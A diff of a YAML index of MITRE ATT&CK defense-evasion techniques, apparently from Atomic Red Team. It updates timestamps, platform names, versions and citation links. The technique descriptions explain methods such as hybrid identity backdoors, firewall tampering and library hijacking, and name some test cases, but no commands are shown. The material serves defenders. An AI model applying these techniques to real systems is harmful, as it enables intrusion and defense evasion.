       - SaaS
-      - Google Workspace
       - IaaS
       - Containers
-      x_mitre_version: '1.3'
+      - Identity Provider
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Logon Session: Logon Session Creation'
@@ -11344,18 +11491,17 @@ defense-evasion:
         description: NIST. (n.d.). Authentication. Retrieved January 30, 2020.
         url: https://csrc.nist.gov/glossary/term/authentication
       - source_name: NIST MFA
-        description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved January
-          30, 2020.
-        url: https://csrc.nist.gov/glossary/term/Multi_Factor-Authentication
+        description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved September
+          25, 2024.
+        url: https://csrc.nist.gov/glossary/term/multi_factor_authentication
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1562.004:
     technique:
-      modified: '2024-03-28T00:01:08.337Z'
+      modified: '2024-09-12T19:37:57.867Z'
       name: 'Impair Defenses: Disable or Modify System Firewall'
       description: |-
         Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage. Changes could be disabling the entire mechanism as well as adding, deleting, or modifying particular rules. This can be done numerous ways depending on the operating system, including via command-line, editing Windows Registry keys, and Windows Control Panel.
@@ -11400,13 +11546,12 @@ defense-evasion:
         url: https://www.huntress.com/blog/blackcat-ransomware-affiliate-ttps
       - source_name: change_rdp_port_conti
         description: 'The DFIR Report. (2022, March 1). "Change RDP port" #ContiLeaks.
-          Retrieved March 1, 2022.'
-        url: https://twitter.com/TheDFIRReport/status/1498657772254240768
+          Retrieved September 12, 2024.'
+        url: https://x.com/TheDFIRReport/status/1498657772254240768
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562.004
     atomic_tests:
     - name: Disable Microsoft Defender Firewall
@@ -12051,7 +12196,7 @@ defense-evasion:
         * **Note:** The above hijacks are also possible without modifying the Registry via [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).
 
         Hijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation. (Citation: SpectorOps Subverting Trust Sept 2017)
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-05T04:58:58.214Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Subvert Trust Controls: SIP and Trust Provider Hijacking'
       x_mitre_detection: |-
@@ -12084,7 +12229,6 @@ defense-evasion:
       - Application Control
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1553.003
     atomic_tests:
     - name: SIP (Subject Interface Package) Hijacking via Custom DLL
@@ -12122,30 +12266,30 @@ defense-evasion:
         elevation_required: true
   T1556.007:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Hybrid Identity
       description: "Adversaries may patch, modify, or otherwise backdoor cloud authentication
         processes that are tied to on-premises user identities in order to bypass
         typical authentication mechanisms, access credentials, and enable persistent
         access to accounts.  \n\nMany organizations maintain hybrid user and device
         identities that are shared between on-premises and cloud-based environments.
-        These can be maintained in a number of ways. For example, Azure AD includes
-        three options for synchronizing identities between Active Directory and Azure
-        AD(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
+        These can be maintained in a number of ways. For example, Microsoft Entra
+        ID includes three options for synchronizing identities between Active Directory
+        and Entra ID(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
         (PHS), in which a privileged on-premises account synchronizes user password
-        hashes between Active Directory and Azure AD, allowing authentication to Azure
-        AD to take place entirely in the cloud \n* Pass Through Authentication (PTA),
-        in which Azure AD authentication attempts are forwarded to an on-premises
+        hashes between Active Directory and Entra ID, allowing authentication to Entra
+        ID to take place entirely in the cloud \n* Pass Through Authentication (PTA),
+        in which Entra ID authentication attempts are forwarded to an on-premises
         PTA agent, which validates the credentials against Active Directory \n* Active
         Directory Federation Services (AD FS), in which a trust relationship is established
-        between Active Directory and Azure AD \n\nAD FS can also be used with other
+        between Active Directory and Entra ID \n\nAD FS can also be used with other
         SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication
         process to AD FS and receive a token containing the hybrid users’ identity
         and privileges. \n\nBy modifying authentication processes tied to hybrid identities,
         an adversary may be able to establish persistent privileged access to cloud
         resources. For example, adversaries who compromise an on-premises server running
         a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService`
-        process that authorizes all attempts to authenticate to Azure AD, as well
+        process that authorizes all attempts to authenticate to Entra ID, as well
         as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation:
         AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary
         may edit the `Microsoft.IdentityServer.Servicehost` configuration file to
@@ -12153,9 +12297,9 @@ defense-evasion:
         any set of claims, thereby bypassing multi-factor authentication and defined
         AD FS policies.(Citation: MagicWeb)\n\nIn some cases, adversaries may be able
         to modify the hybrid identity authentication process from the cloud. For example,
-        adversaries who compromise a Global Administrator account in an Azure AD tenant
+        adversaries who compromise a Global Administrator account in an Entra ID tenant
         may be able to register a new PTA agent via the web console, similarly allowing
-        them to harvest credentials and log into the Azure AD environment as any user.(Citation:
+        them to harvest credentials and log into the Entra ID environment as any user.(Citation:
         Mandiant Azure AD Backdoors)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
@@ -12164,21 +12308,22 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_contributors:
+      - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
       - SaaS
-      - Google Workspace
-      - Office 365
       - IaaS
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Praetorian
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Module: Module Load'
@@ -12218,9 +12363,6 @@ defense-evasion:
         url: https://www.mandiant.com/resources/detecting-microsoft-365-azure-active-directory-backdoors
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1218.015:
     technique:
@@ -12283,7 +12425,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1562.012:
     technique:
@@ -12343,7 +12484,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562.012
     atomic_tests:
     - name: Delete all auditd rules using auditctl
@@ -12450,7 +12590,7 @@ defense-evasion:
         description: Lucand,G. (2018, February 18). Detect DCShadow, impossible?.
           Retrieved March 30, 2018.
         source_name: ADDSecurity DCShadow Feb 2018
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-08T21:20:04.850Z'
       name: Rogue Domain Controller
       description: |-
         Adversaries may register a rogue Domain Controller to enable manipulation of Active Directory data. DCShadow may be used to create a rogue Domain Controller (DC). DCShadow is a method of manipulating Active Directory (AD) data, including objects and schemas, by registering (or reusing an inactive registration) and simulating the behavior of a DC. (Citation: DCShadow Blog) Once registered, a rogue DC may be able to inject and replicate changes into AD infrastructure for any domain object, including credentials and keys.
@@ -12481,8 +12621,6 @@ defense-evasion:
       x_mitre_permissions_required:
       - Administrator
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1207
     atomic_tests:
     - name: DCShadow (Active Directory)
@@ -12666,7 +12804,7 @@ defense-evasion:
         Escalation](https://attack.mitre.org/techniques/T1068) using a signed, but
         vulnerable driver.(Citation: Unit42 AcidBox June 2020)(Citation: GitHub Turla
         Driver Loader)"
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-05T05:00:03.480Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Subvert Trust Controls: Code Signing Policy Modification'
       x_mitre_detection: 'Monitor processes and command-line arguments for actions
@@ -12690,7 +12828,6 @@ defense-evasion:
       - Application Control
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1553.006
     atomic_tests:
     - name: Code Signing Policy Modification
@@ -12706,7 +12843,7 @@ defense-evasion:
         elevation_required: true
   T1610:
     technique:
-      modified: '2024-04-11T21:24:42.680Z'
+      modified: '2024-10-15T15:06:17.124Z'
       name: Deploy a container
       description: |-
         Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment. In Kubernetes environments, an adversary may attempt to deploy a privileged or vulnerable container into a specific node in order to [Escape to Host](https://attack.mitre.org/techniques/T1611) and access other containers running on the node. (Citation: AppSecco Kubernetes Namespace Breakout 2020)
@@ -12785,7 +12922,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1610
     atomic_tests:
     - name: Deploy Docker container
@@ -12904,7 +13040,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1112
     atomic_tests:
     - name: Modify Registry of Current User Profile - cmd
@@ -14641,7 +14776,7 @@ defense-evasion:
         elevation_required: true
   T1574.008:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T15:25:57.059Z'
       name: 'Hijack Execution Flow: Path Interception by Search Order Hijacking'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
@@ -14660,6 +14795,7 @@ defense-evasion:
         phase_name: defense-evasion
       x_mitre_contributors:
       - Stefan Kanthak
+      x_mitre_deprecated: false
       x_mitre_detection: |
         Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.
 
@@ -14667,7 +14803,6 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.0'
@@ -14687,29 +14822,31 @@ defense-evasion:
       id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2
       created: '2020-03-13T17:48:58.999Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1574/008
         external_id: T1574.008
+      - source_name: Microsoft Environment Property
+        description: Microsoft. (2011, October 24). Environment Property. Retrieved
+          July 27, 2016.
+        url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
       - source_name: Microsoft CreateProcess
-        description: Microsoft. (n.d.). CreateProcess function. Retrieved December
-          5, 2014.
-        url: http://msdn.microsoft.com/en-us/library/ms682425
+        description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
+      - source_name: Microsoft WinExec
+        description: Microsoft. (n.d.). WinExec function. Retrieved September 12,
+          2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-winexec
       - source_name: Windows NT Command Shell
         description: Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved
           December 5, 2014.
         url: https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120
-      - source_name: Microsoft WinExec
-        description: Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014.
-        url: http://msdn.microsoft.com/en-us/library/ms687393
-      - source_name: Microsoft Environment Property
-        description: Microsoft. (2011, October 24). Environment Property. Retrieved
-          July 27, 2016.
-        url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1574.008
     atomic_tests:
     - name: powerShell Persistence via hijacking default modules - Get-Variable.exe
@@ -14776,7 +14913,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1027.001:
     technique:
@@ -14843,7 +14979,6 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
       identifier: T1027.001
     atomic_tests:
     - name: Pad Binary to Change Hash - Linux/macOS dd
@@ -14915,7 +15050,7 @@ defense-evasion:
         name: sh
   T1484.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-23T22:11:01.884Z'
       name: 'Domain Policy Modification: Group Policy Modification'
       description: "Adversaries may modify Group Policy Objects (GPOs) to subvert
         the intended discretionary access controls for a domain, usually with the
@@ -14951,6 +15086,10 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_contributors:
+      - Itamar Mizrahi, Cymptom
+      - Tristan Bennett, Seamless Intelligence
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         It is possible to detect GPO modifications by monitoring directory service changes using Windows event logs. Several events may be logged for such GPO modifications, including:
 
@@ -14962,16 +15101,12 @@ defense-evasion:
 
 
         GPO abuse will often be accompanied by some other behavior such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), which will have events associated with it to detect. Subsequent permission value modifications, like those to SeEnableDelegationPrivilege, can also be searched for in events associated with privileges assigned to new logons (Event ID 4672) and assignment of user rights (Event ID 4704).
-      x_mitre_platforms:
-      - Windows
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
       x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Itamar Mizrahi, Cymptom
-      - Tristan Bennett, Seamless Intelligence
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Active Directory: Active Directory Object Creation'
@@ -15007,12 +15142,12 @@ defense-evasion:
         url: https://wald0.com/?p=179
       - source_name: Harmj0y Abusing GPO Permissions
         description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
-          March 5, 2019.
-        url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+          September 23, 2024.
+        url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
       - source_name: Harmj0y SeEnableDelegationPrivilege Right
         description: Schroeder, W. (2017, January 10). The Most Dangerous User Right
-          You (Probably) Have Never Heard Of. Retrieved March 5, 2019.
-        url: http://www.harmj0y.net/blog/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
+          You (Probably) Have Never Heard Of. Retrieved September 23, 2024.
+        url: https://blog.harmj0y.net/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
       - source_name: TechNet Group Policy Basics
         description: 'srachui. (2012, February 13). Group Policy Basics – Part 1:
           Understanding the Structure of a Group Policy Object. Retrieved March 5,
@@ -15020,9 +15155,8 @@ defense-evasion:
         url: https://blogs.technet.microsoft.com/musings_of_a_technical_tam/2012/02/13/group-policy-basics-part-1-understanding-the-structure-of-a-group-policy-object/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1484.001
     atomic_tests:
     - name: LockBit Black - Modify Group policy settings -cmd
@@ -15078,7 +15212,7 @@ defense-evasion:
         elevation_required: true
   T1078.001:
     technique:
-      modified: '2024-03-07T14:27:04.770Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Default Accounts'
       description: |-
         Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -15093,6 +15227,7 @@ defense-evasion:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_deprecated: false
       x_mitre_detection: Monitor whether default accounts have been activated or logged
         into. These audits should also include checks on any appliances and applications
@@ -15101,18 +15236,18 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -15144,9 +15279,6 @@ defense-evasion:
         url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.001
     atomic_tests:
     - name: Enable Guest account with RDP capability and admin privileges
@@ -15229,7 +15361,7 @@ defense-evasion:
         elevation_required: true
   T1574.006:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:40.146Z'
       name: 'Hijack Execution Flow: LD_PRELOAD'
       description: "Adversaries may execute their own malicious payloads by hijacking
         environment variables the dynamic linker uses to load shared libraries. During
@@ -15350,7 +15482,6 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
       identifier: T1574.006
     atomic_tests:
     - name: Shared Library Injection via /etc/ld.so.preload
@@ -15540,7 +15671,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1070.001
     atomic_tests:
     - name: Clear Logs
@@ -15609,7 +15739,7 @@ defense-evasion:
         elevation_required: true
   T1222:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-19T17:54:06.038Z'
       name: File and Directory Permissions Modification
       description: "Adversaries may modify file or directory permissions/attributes
         to evade access control lists (ACLs) and access protected files.(Citation:
@@ -15706,7 +15836,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1222
     atomic_tests:
     - name: Enable Local and Remote Symbolic Links via fsutil
@@ -15759,7 +15888,7 @@ defense-evasion:
         elevation_required: true
   T1548:
     technique:
-      modified: '2024-04-15T20:52:09.908Z'
+      modified: '2024-10-15T15:32:21.811Z'
       name: Abuse Elevation Control Mechanism
       description: 'Adversaries may circumvent mechanisms designed to control elevate
         privileges to gain higher-level permissions. Most modern systems contain native
@@ -15791,11 +15920,10 @@ defense-evasion:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - IaaS
-      - Google Workspace
-      - Azure AD
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'User Account: User Account Modification'
@@ -15836,11 +15964,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1134.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-11T21:14:37.714Z'
       name: Create Process with Token
       description: |-
         Adversaries may create a new process with an existing token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as <code>CreateProcessWithTokenW</code> and <code>runas</code>.(Citation: Microsoft RunAs)
@@ -15896,7 +16023,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1134.002
     atomic_tests:
     - name: Access Token Manipulation
@@ -15930,7 +16056,7 @@ defense-evasion:
         name: powershell
   T1548.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-15T18:43:20.995Z'
       name: 'Abuse Elevation Control Mechanism: Setuid and Setgid'
       description: |-
         An adversary may abuse configurations where an application has the setuid or setgid bits set in order to get code running in a different (and possibly more privileged) user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application binary, the application will run with the privileges of the owning user or group respectively.(Citation: setuid man page) Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them may not have the specific required privileges.
@@ -15987,7 +16113,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1548.001
     atomic_tests:
     - name: Make and modify binary from C source
@@ -16238,7 +16363,7 @@ defense-evasion:
         description: 'Giagone, R., Bermejo, L., and Yarochkin, F. (2017, November
           20). Cobalt Strikes Again: Spam Runs Use Macros and CVE-2017-8759 Exploit
           Against Russian Banks. Retrieved March 7, 2019.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T18:52:49.877Z'
       name: 'Signed Binary Proxy Execution: Odbcconf'
       description: "Adversaries may abuse odbcconf.exe to proxy execution of malicious
         payloads. Odbcconf.exe is a Windows utility that allows you to configure Open
@@ -16271,8 +16396,6 @@ defense-evasion:
       - Application control
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1218.008
     atomic_tests:
     - name: Odbcconf.exe - Execute Arbitrary DLL
@@ -16338,7 +16461,7 @@ defense-evasion:
         name: command_prompt
   T1548.005:
     technique:
-      modified: '2024-03-28T15:30:09.313Z'
+      modified: '2024-10-15T16:07:49.519Z'
       name: Temporary Elevated Cloud Access
       description: "Adversaries may abuse permission configurations that allow them
         to gain temporarily elevated access to cloud resources. Many cloud environments
@@ -16400,10 +16523,9 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - IaaS
-      - Azure AD
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '1.1'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'User Account: User Account Modification'
       type: attack-pattern
@@ -16461,7 +16583,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1055.013:
     technique:
@@ -16503,7 +16624,7 @@ defense-evasion:
         description: Microsoft. (n.d.). PsSetCreateProcessNotifyRoutine routine. Retrieved
           December 20, 2017.
         source_name: Microsoft PsSetCreateProcessNotifyRoutine routine
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-02-09T15:43:48.848Z'
       name: Process Doppelgänging
       description: "Adversaries may inject malicious code into process via process
         doppelgänging in order to evade process-based defenses as well as possibly
@@ -16562,41 +16683,10 @@ defense-evasion:
       - Administrator
       - SYSTEM
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1578.003:
     technique:
-      x_mitre_platforms:
-      - IaaS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--70857657-bd0b-4695-ad3e-b13f92cac1b4
-      type: attack-pattern
-      created: '2020-06-16T17:23:06.508Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1578.003
-        url: https://attack.mitre.org/techniques/T1578/003
-      - source_name: Mandiant M-Trends 2020
-        url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
-        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
-          2020.
-      - source_name: AWS CloudTrail Search
-        url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
-        description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
-          Retrieved June 17, 2020.
-      - source_name: Azure Activity Logs
-        url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
-        description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
-          2020.
-      - source_name: Cloud Audit Logs
-        url: https://cloud.google.com/logging/docs/audit#admin-activity
-        description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-30T13:28:37.415Z'
       name: Delete Cloud Instance
       description: |-
         An adversary may delete a cloud instance after they have performed malicious activities in an attempt to evade detection and remove evidence of their presence.  Deleting an instance or virtual machine can remove valuable forensic artifacts and other evidence of suspicious behavior if the instance is not recoverable.
@@ -16605,20 +16695,50 @@ defense-evasion:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
+      x_mitre_contributors:
+      - Arun Seelagan, CISA
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         The deletion of a new instance or virtual machine is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, detecting a sequence of events such as the creation of an instance, mounting of a snapshot to that instance, and deletion of that instance by a new user account may indicate suspicious activity.
 
         In AWS, CloudTrail logs capture the deletion of an instance in the <code>TerminateInstances</code> event, and in Azure the deletion of a VM may be captured in Azure activity logs.(Citation: AWS CloudTrail Search)(Citation: Azure Activity Logs) Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of <code>gcloud compute instances delete</code> to delete a VM.(Citation: Cloud Audit Logs)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - IaaS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Instance: Instance Metadata'
